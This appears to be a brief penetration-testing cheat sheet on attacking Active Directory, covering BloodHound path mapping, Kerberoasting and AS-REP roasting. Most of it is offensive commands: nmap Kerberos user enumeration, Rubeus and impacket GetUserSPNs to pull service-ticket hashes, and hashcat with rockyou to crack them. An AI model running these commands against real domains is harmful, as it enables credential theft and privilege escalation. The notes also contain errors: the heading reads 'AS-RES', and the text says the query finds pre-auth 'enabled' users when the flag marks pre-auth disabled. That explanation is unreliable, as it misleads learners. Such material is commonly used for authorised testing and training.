Relationships and Attack paths

We can use bloodhound to find hidden relationships and attack paths in an Active Directory environment.

From the data collect we can escalate our privilege to the target, or use tools like aclpwn.

Kerberoasting

The AD Powershell module can be used to search for users with SPN

Using Nmap:

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Using Rubeus to gain hashes:

Rubeus.exe kerberoast /outfile:hashes.txt

Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack:

hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt

Using impacket:

``

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

https://newerasec.com/kerberoasting/

AS-RES

Find users with pre-auth enabled using the AD Powershell module :

Import-Module .\\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name